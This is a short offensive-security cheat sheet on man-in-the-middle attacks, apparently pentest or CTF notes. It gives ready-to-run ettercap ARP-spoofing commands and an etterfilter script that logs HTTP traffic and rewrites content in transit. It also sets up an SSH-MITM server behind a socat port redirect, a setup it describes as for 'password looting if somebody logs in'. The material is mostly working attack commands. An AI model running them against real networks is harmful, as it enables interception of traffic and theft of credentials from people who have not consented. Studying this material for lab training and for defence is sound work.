# Man In the Middle


## Ettercap

* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)

* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
```sh
ettercap -T -i <interface> -M arp
```

* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```sh
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
    log(DATA.data, "/tmp/ettercap.log");
    replace("filename.html", "otherfilename.html" );
    msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```

* Escape double quote inside the payload string
* compile via 
```sh
etterfilter filter.ef -o filter.ef
```

* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```

## mitm-server

Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.

Redirect the port to the mitm server and start it afterwards

```sh
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)

ssh-mitm server --remote-host $TARGET_IP
```